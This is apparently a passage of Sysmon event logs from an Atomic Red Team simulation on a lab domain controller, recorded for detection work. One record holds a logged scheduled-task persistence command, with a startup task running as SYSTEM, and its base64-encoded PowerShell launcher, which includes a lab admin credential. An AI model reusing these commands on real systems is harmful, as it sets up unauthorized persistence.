{"EventTime":"2020-08-01 06:55:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5669,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:18.650\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:18.650","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5670,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:18.650\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:18.650","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5671,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:18.650\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:18.650","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5672,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:18.650\r\nSourceProcessGUID: {E2A3D6B1-11D4-5F25-0000-00100D0C0800}\r\nSourceProcessId: 796\r\nSourceThreadId: 2504\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-11D6-5F25-0000-0010EC530800}\r\nTargetProcessId: 4972\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:18.650","SourceProcessGUID":"{E2A3D6B1-11D4-5F25-0000-00100D0C0800}","SourceProcessId":"796","SourceThreadId":"2504","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-11D6-5F25-0000-0010EC530800}","TargetProcessId":"4972","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":5673,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 06:55:18.666\r\nProcessGuid: {E2A3D6B1-11D6-5F25-0000-00101A500800}\r\nProcessId: 4968\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nTargetFilename: C:\\Users\\Administrator\\AppData\\Local\\Temp\\pgch3ubf\\pgch3ubf.dll\r\nCreationUtcTime: 2020-08-01 06:55:18.588","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 06:55:18.666","ProcessGuid":"{E2A3D6B1-11D6-5F25-0000-00101A500800}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe","TargetFilename":"C:\\Users\\Administrator\\AppData\\Local\\Temp\\pgch3ubf\\pgch3ubf.dll","CreationUtcTime":"2020-08-01 06:55:18.588","EventReceivedTime":"2020-08-01 06:55:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":5674,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:19.116\r\nProcessGuid: {E2A3D6B1-11D7-5F25-0000-001068550800}\r\nProcessId: 4924\r\nImage: C:\\Windows\\System32\\cmd.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Windows Command Processor\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: Cmd.Exe\r\nCommandLine: \"C:\\Windows\\system32\\cmd.exe\" /c \"schtasks /create /tn \"T1053_005_OnLogon\" /sc onlogon /tr \"cmd.exe /c calc.exe\" & schtasks /create /tn \"T1053_005_OnStartup\" /sc onstart /ru system /tr \"cmd.exe /c calc.exe\"\" \r\nCurrentDirectory: C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {E2A3D6B1-11D4-5F25-0000-00205F0B0800}\r\nLogonId: 0x80B5F\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A\r\nParentProcessGuid: {E2A3D6B1-11D6-5F25-0000-00106A320800}\r\nParentProcessId: 4848\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \"powershell.exe\" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgAkAG0AeQBBAHIAZwBzACAAPQAgAEAAewAgACIAdQBzAGUAcgBfAG4AYQBtAGUAIgAgAD0AIAAiAEEAVABUAEEAQwBLAFIAQQBOAEcARQBcAEEAZABtAGkAbgBpAHMAdAByAGEAdABvAHIAIgA7ACAAIgBwAGEAcwBzAHcAbwByAGQAIgAgAD0AIAAiAEkALQBsADEAawBlAC0AQQB0AHQAYQBjAGsALQBSAGEAbgBnAGUAIQAiACAAfQAKAEkAbgB2AG8AawBlAC0AQQB0AG8AbQBpAGMAVABlAHMAdAAgACIAVAAxADAANQAzAC4AMAAwADUAIgAgAC0ASQBuAHAAdQB0AEEAcgBnAHMAIAAkAG0AeQBBAHIAZwBzACAALQBDAG8AbgBmAGkAcgBtADoAJABmAGEAbABzAGUAIAAtAFQAaQBtAGUAbwB1AHQAUwBlAGMAbwBuAGQAcwAgADMAMAAwACAALQBFAHgAZQBjAHUAdABpAG8AbgBMAG8AZwBQAGEAdABoACAAQwA6AFwAQQB0AG8AbQBpAGMAUgBlAGQAVABlAGEAbQBcAGEAdABjAF8AZQB4AGUAYwB1AHQAaQBvAG4ALgBjAHMAdgA=","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:55:19.116","ProcessGuid":"{E2A3D6B1-11D7-5F25-0000-001068550800}","Image":"C:\\Windows\\System32\\cmd.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Windows Command Processor","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"Cmd.Exe","CommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"schtasks /create /tn \"T1053_005_OnLogon\" /sc onlogon /tr \"cmd.exe /c calc.exe\" &amp; schtasks /create /tn \"T1053_005_OnStartup\" /sc onstart /ru system /tr \"cmd.exe /c calc.exe\"\" ","CurrentDirectory":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{E2A3D6B1-11D4-5F25-0000-00205F0B0800}","LogonId":"0x80b5f","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A","ParentProcessGuid":"{E2A3D6B1-11D6-5F25-0000-00106A320800}","ParentProcessId":"4848","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentCommandLine":"\"powershell.exe\" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgAkAG0AeQBBAHIAZwBzACAAPQAgAEAAewAgACIAdQBzAGUAcgBfAG4AYQBtAGUAIgAgAD0AIAAiAEEAVABUAEEAQwBLAFIAQQBOAEcARQBcAEEAZABtAGkAbgBpAHMAdAByAGEAdABvAHIAIgA7ACAAIgBwAGEAcwBzAHcAbwByAGQAIgAgAD0AIAAiAEkALQBsADEAawBlAC0AQQB0AHQAYQBjAGsALQBSAGEAbgBnAGUAIQAiACAAfQAKAEkAbgB2AG8AawBlAC0AQQB0AG8AbQBpAGMAVABlAHMAdAAgACIAVAAxADAANQAzAC4AMAAwADUAIgAgAC0ASQBuAHAAdQB0AEEAcgBnAHMAIAAkAG0AeQBBAHIAZwBzACAALQBDAG8AbgBmAGkAcgBtADoAJABmAGEAbABzAGUAIAAtAFQAaQBtAGUAbwB1AHQAUwBlAGMAbwBuAGQAcwAgADMAMAAwACAALQBFAHgAZQBjAHUAdABpAG8AbgBMAG8AZwBQAGEAdABoACAAQwA6AFwAQQB0AG8AbQBpAGMAUgBlAGQAVABlAGEAbQBcAGEAdABjAF8AZQB4AGUAYwB1AHQAaQBvAG4ALgBjAHMAdgA=","EventReceivedTime":"2020-08-01 06:55:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5675,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:19.104\r\nSourceProcessGUID: {E2A3D6B1-11D6-5F25-0000-00106A320800}\r\nSourceProcessId: 4848\r\nSourceThreadId: 1100\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {E2A3D6B1-11D3-5F25-0000-00107FE20700}\r\nTargetProcessId: 4924\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+f786dcb8(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+f786dcb8(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+f786dcb8(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+f786dcb8(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+978635cf(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97863443(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+978e5c6f(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+9785c02b(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+98314fce(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97824823(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97882cf2(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97866357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97866357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97866357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97866357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97866357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97866357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+978661e8(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+9785816d(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+978912fd(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:19.104","SourceProcessGUID":"{E2A3D6B1-11D6-5F25-0000-00106A320800}","SourceProcessId":"4848","SourceThreadId":"1100","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{E2A3D6B1-11D3-5F25-0000-00107FE20700}","TargetProcessId":"4924","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+f786dcb8(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+f786dcb8(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+f786dcb8(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+f786dcb8(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+978635cf(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97863443(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+978e5c6f(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa